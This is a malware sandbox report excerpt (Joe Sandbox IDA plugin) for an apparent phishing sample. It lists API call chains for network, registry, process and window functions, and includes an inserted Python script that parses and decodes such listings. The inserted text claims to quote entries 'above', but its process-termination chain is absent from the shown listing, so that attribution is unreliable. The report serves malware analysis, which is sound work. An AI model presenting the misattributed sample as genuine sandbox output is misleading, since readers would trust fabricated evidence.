                        • Part of subcall function 00A97F40: _memmove.LIBCMT ref: 00A97F8F
                        • Part of subcall function 00A9A2FB: _memmove.LIBCMT ref: 00A9A33D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$BuffCharLower
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 2411302734-567219261
                      • Opcode ID: 93dce18c18e185d8d3e48e2167defc0507cf9ed4aa1574c06a5189a8fc233c58
                      • Instruction ID: 37635e7b08491df0cf361b6c9e090c471f822f8d97b0163e39a168cc06dd7f9d
                      • Opcode Fuzzy Hash: 93dce18c18e185d8d3e48e2167defc0507cf9ed4aa1574c06a5189a8fc233c58
                      • Instruction Fuzzy Hash: 49316D75600619AFCF04DF98C941ABEB3F5FF15350B108A29E562972D2DB71EA05CF80
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ACC684
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ACC697
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ACC6C7
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 458670788-1403004172
                      • Opcode ID: 9225fe16870f89dd16ba6d87bf11d26f79284093000b0e9fde479bda8174e3af
                      • Instruction ID: e32ac47711f5e2a4d8dd932ab2a8af1d0c5c68141d5583733a1ed7f737b44d1e
                      • Opcode Fuzzy Hash: 9225fe16870f89dd16ba6d87bf11d26f79284093000b0e9fde479bda8174e3af
                      • Instruction Fuzzy Hash: DB21F171A00108BEDB04EB64C986EFFBBB9DF06360B11961DF42AE71E1DB745D0A9720
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A86
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AE4AB6
                      • InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                        • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 1951874230-3916222277
                      • Opcode ID: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                      • Instruction ID: 882c28041cd61df97041c4b88e8b60fdd9112091e24eb083bb37d8ddb57ed62f
                      • Opcode Fuzzy Hash: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                      • Instruction Fuzzy Hash: 5F21CFB5540208BFEB11DF669C84EBBB6FCEB8C798F10402AF50597140EA649D059771
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF8F69
                      • LoadLibraryW.KERNEL32(?), ref: 00AF8F70
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF8F85
                      • DestroyWindow.USER32(?), ref: 00AF8F8D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                      • Instruction ID: 77bc8e72b1eda64cf36e6f5532e7d76e3a10b583b0eddb887f8976c154779278
                      • Opcode Fuzzy Hash: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                      • Instruction Fuzzy Hash: EA21AC71200209AFEF104FA4EC80EBB77AEEF49364F104628FB1597191CB79DC509760
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADE392
                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00ADE3E6
                      • __swprintf.LIBCMT ref: 00ADE3FF
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2DBF0), ref: 00ADE43D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: 88921d5a18ef5d6a83db2b07db9c918c2c712464aab9697ed0b393fb35df68d3
                      • Instruction ID: 10662ec598aa333e649a9c6fd778e4db25fc0e6c50f21570191aaf1e020628cc
                      • Opcode Fuzzy Hash: 88921d5a18ef5d6a83db2b07db9c918c2c712464aab9697ed0b393fb35df68d3
                      • Instruction Fuzzy Hash: BA214F75A40108AFCB10EB64C985EEEB7F8EF99714B1080A9F509EB251D631DA05CB50
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                        • Part of subcall function 00ACD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                        • Part of subcall function 00ACD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                        • Part of subcall function 00ACD623: GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                        • Part of subcall function 00ACD623: AttachThreadInput.USER32(00000000), ref: 00ACD661
                      • GetFocus.USER32 ref: 00ACD7FB
                        • Part of subcall function 00ACD66C: GetParent.USER32(?), ref: 00ACD67A
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACD844
                      • EnumChildWindows.USER32(?,00ACD8BA), ref: 00ACD86C
                      • __swprintf.LIBCMT ref: 00ACD886
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                      • String ID: %s%d
                      • API String ID: 1941087503-1110647743
                      • Opcode ID: 17e1cee4c6c5f82419ee21ec24bc0f57939f868ac52d919c26c162032923adff
                      • Instruction ID: d798cc8805b90a16383d3329afd0522796139e8b7c6071aa3bd316cdfa6d7b3a
                      • Opcode Fuzzy Hash: 17e1cee4c6c5f82419ee21ec24bc0f57939f868ac52d919c26c162032923adff
                      • Instruction Fuzzy Hash: A111AF756102056BDF11BF608D86FEA37A9AB44704F0180B9BA0DAB186CBB45945DB70
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AF18E4
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AF1917
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AF1A3A
                      • CloseHandle.KERNEL32(?), ref: 00AF1AB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: 773b8a28c4394ccd2edbcaf3c27221dfe4579201db678239dded3d9df3c67cc5
                      • Instruction ID: d78ebad5883591a2f69f5fd4f9404d53c3cea250ed1693ce7ca24132fb405baa
                      • Opcode Fuzzy Hash: 773b8a28c4394ccd2edbcaf3c27221dfe4579201db678239dded3d9df3c67cc5
                      • Instruction Fuzzy Hash: 0F817174A40205EBDF10EF64C986BAD7BF5AF49760F148459F905AF3C2D7B8E9408B90
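                      The entries above list raw Win32 calls with their arguments as bare hex, which hides what the call chains do: the PostMessageW / SendMessageTimeoutW / GetWindowThreadProcessId / OpenProcess / TerminateProcess chain sends WM_CLOSE (0x10), waits 500 ms with SMTO_ABORTIFHUNG, then opens the owning process with PROCESS_ALL_ACCESS (0x1F0FFF) and kills it; the WinINet chain asks HttpQueryInfoW for HTTP_QUERY_CONTENT_LENGTH (5); the OpenProcess(0x410) entry requests PROCESS_QUERY_INFORMATION | PROCESS_VM_READ before GetProcessMemoryInfo. As an added example that is not part of the Joe Sandbox report, the Python script below parses such "APIs" listings, translates the argument values whose meaning is fixed by the API contract into their constant names, and flags the behaviour each chain implements. The embedded sample text is copied from three entries above (argument lists abridged); the behaviour labels and the decode_call / classify helpers are this example's own, not sandbox output.

```python
"""Added example (not part of the Joe Sandbox report): parse the 'APIs'
listings of function entries and decode their arguments into Win32 names."""
import re
from dataclasses import dataclass, field

# Constructed sample: three 'APIs' sections copied from the report entries
# above (argument lists abridged), separated by the report's next header.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AD8504
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AD851A
• GetWindowThreadProcessId.USER32(?,?), ref: 00AD8529
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 00AD8538
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 00AD8542
• CloseHandle.KERNEL32(00000000,?), ref: 00AD8549
Memory Dump Source
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A86
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AE4AB6
• InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
  • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
Memory Dump Source
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AF18E4
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AF1917
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AF1A3A
• CloseHandle.KERNEL32(?), ref: 00AF1AB0
Memory Dump Source
"""

# One call line: optional 'Part of subcall' prefix, Name.MODULE, optional
# (args), then 'ref: <address>'. LIBCMT lines have no argument list.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class Call:
    name: str
    module: str
    args: list   # int for hex literals, None for '?', str for names such as DllGetClassObject
    ref: str

@dataclass
class Entry:
    calls: list = field(default_factory=list)

def _arg(text):
    text = text.strip()
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:
        return text

def parse_entries(text):
    """Split the listing at each 'APIs' header and collect its call lines."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        m = CALL_RE.match(line)
        if cur is None or m is None:
            continue
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
        cur.calls.append(Call(m["name"], m["module"], args, m["ref"]))
    return entries

# Win32 constants seen in the report (values from the Windows SDK headers).
WM = {0x10: "WM_CLOSE", 0x30: "WM_SETFONT", 0x188: "LB_GETCURSEL",
      0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN", 0x467: "ACM_OPENW"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
      0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
SMTO = {0: "SMTO_NORMAL", 1: "SMTO_BLOCK", 2: "SMTO_ABORTIFHUNG"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH"}
SEM = {1: "SEM_FAILCRITICALERRORS"}
PROCESS_RIGHTS = [
    (0x1, "PROCESS_TERMINATE"), (0x2, "PROCESS_CREATE_THREAD"), (0x4, "PROCESS_SET_SESSIONID"),
    (0x8, "PROCESS_VM_OPERATION"), (0x10, "PROCESS_VM_READ"), (0x20, "PROCESS_VM_WRITE"),
    (0x40, "PROCESS_DUP_HANDLE"), (0x80, "PROCESS_CREATE_PROCESS"), (0x100, "PROCESS_SET_QUOTA"),
    (0x200, "PROCESS_SET_INFORMATION"), (0x400, "PROCESS_QUERY_INFORMATION"),
    (0x800, "PROCESS_SUSPEND_RESUME"), (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0xF0000, "STANDARD_RIGHTS_REQUIRED"), (0x100000, "SYNCHRONIZE")]

def decode_process_access(mask):
    """Expand an OpenProcess access mask; 0x1F0FFF is the classic PROCESS_ALL_ACCESS."""
    if mask == 0x1F0FFF:
        return "PROCESS_ALL_ACCESS"
    return "|".join(n for bit, n in PROCESS_RIGHTS if mask & bit == bit) or hex(mask)

def decode_call(call):
    """Return notes for the arguments whose meaning is fixed by the API."""
    a, notes = call.args, []

    def lookup(idx, table, label):
        if idx < len(a) and isinstance(a[idx], int) and a[idx] in table:
            notes.append(f"{label}={table[a[idx]]}")

    if call.name in ("PostMessageW", "SendMessageW", "SendMessageTimeoutW"):
        lookup(1, WM, "msg")                      # uMsg
    if call.name == "SendMessageTimeoutW":
        lookup(4, SMTO, "flags")                  # fuFlags
        if len(a) > 5 and isinstance(a[5], int):
            notes.append(f"timeout={a[5]}ms")     # uTimeout
    elif call.name == "OpenProcess" and a and isinstance(a[0], int):
        notes.append("access=" + decode_process_access(a[0]))
    elif call.name == "MapVirtualKeyW":
        lookup(0, VK, "vk")
    elif call.name == "HttpQueryInfoW":
        lookup(1, HTTP_QUERY, "info")             # dwInfoLevel
    elif call.name == "SetErrorMode":
        lookup(0, SEM, "mode")
    return notes

# Behaviour labels are this example's own, keyed on the APIs a chain must contain.
BEHAVIOURS = {
    "terminates the process owning a window": {"GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"},
    "HTTP request via WinINet": {"HttpSendRequestW", "HttpQueryInfoW"},
    "resolves imports at runtime": {"LoadLibraryW", "GetProcAddress"},
    "queries another process's memory/IO counters": {"OpenProcess", "GetProcessMemoryInfo"},
}

def classify(entry):
    seen = {c.name for c in entry.calls}
    return [label for label, needed in BEHAVIOURS.items() if needed <= seen]

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print("behaviours:", classify(e) or ["none flagged"])
        for c in e.calls:
            print(f"  {c.ref} {c.name}.{c.module}", " ".join(decode_call(c)))
```

Feed the script the text of any entry on this page and extend the tables as further constants turn up; the behaviour sets are deliberately strict (all listed APIs must appear in the same function) so that a lone OpenProcess or GetProcAddress does not get flagged.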
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00AF05DF
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00AF066E
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AF068C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00AF06D2
                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 00AF06EC
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                      • String ID:
                      • API String ID: 327935632-0
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2DE0
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2E1F
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AF2E66
                      • RegCloseKey.ADVAPI32(?,?), ref: 00AF2E92
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF2E9F
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AE17D4
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AE17FD
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AE183C
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AE1861
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AE1869
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      APIs
                      • GetCursorPos.USER32(000000FF), ref: 00AAB749
                      • ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                      • GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                      • GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00ACC156
                      • PostMessageW.USER32(?,00000201,00000001), ref: 00ACC200
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ACC208
                      • PostMessageW.USER32(?,00000202,00000000), ref: 00ACC216
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ACC21E
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00ACE9CD
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE9EA
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACEA22
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ACEA48
                      • _wcsstr.LIBCMT ref: 00ACEA52
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFDCC0
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AFDCE4
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AFDCFC
                      • GetSystemMetrics.USER32(00000004), ref: 00AFDD24
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00AE407D,00000000), ref: 00AFDD42
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ACCA86
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAB8
                      • __itow.LIBCMT ref: 00ACCAD0
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAF6
                      • __itow.LIBCMT ref: 00ACCB07
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      APIs
                        • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                      • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                      • GetLastError.KERNEL32 ref: 00AD6DC5
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                      • _wcsrchr.LIBCMT ref: 00AD6DFB
                        • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6E31
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                      • String ID:
                      • API String ID: 3633006590-0
                      APIs
                        • Part of subcall function 00AEACD3: inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00AE9160
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE916F
                      • connect.WSOCK32(00000000,?,00000010), ref: 00AE918B
                      Similarity
                      • API ID: ErrorLastconnectinet_addrsocket
                      • String ID:
                      • API String ID: 3701255441-0
                      APIs
                      • IsWindow.USER32(00000000), ref: 00AE89CE
                      • GetForegroundWindow.USER32 ref: 00AE89E5
                      • GetDC.USER32(00000000), ref: 00AE8A21
                      • GetPixel.GDI32(00000000,?,00000003), ref: 00AE8A2D
                      • ReleaseDC.USER32(00000000,00000003), ref: 00AE8A68
                      Similarity
                      • API ID: Window$ForegroundPixelRelease
                      • String ID:
                      • API String ID: 4156661090-0
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                      • SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                      • BeginPath.GDI32(?), ref: 00AAB611
                      • SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      APIs
                      • __calloc_crt.LIBCMT ref: 00AB2E81
                      • CreateThread.KERNEL32(?,?,00AB2FB7,00000000,?,?), ref: 00AB2EC5
                      • GetLastError.KERNEL32 ref: 00AB2ECF
                      • _free.LIBCMT ref: 00AB2ED8
                      • __dosmaperr.LIBCMT ref: 00AB2EE3
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Similarity
                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                      • String ID:
                      • API String ID: 2664167353-0
                      APIs
                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                      • GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                      • GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                      • HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8371
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD837F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8387
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD8391
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                      • Instruction ID: 102b5be0eabdcf5c93516de384bf674b2a579c1c57e66c9d019e4f10286ecb8f
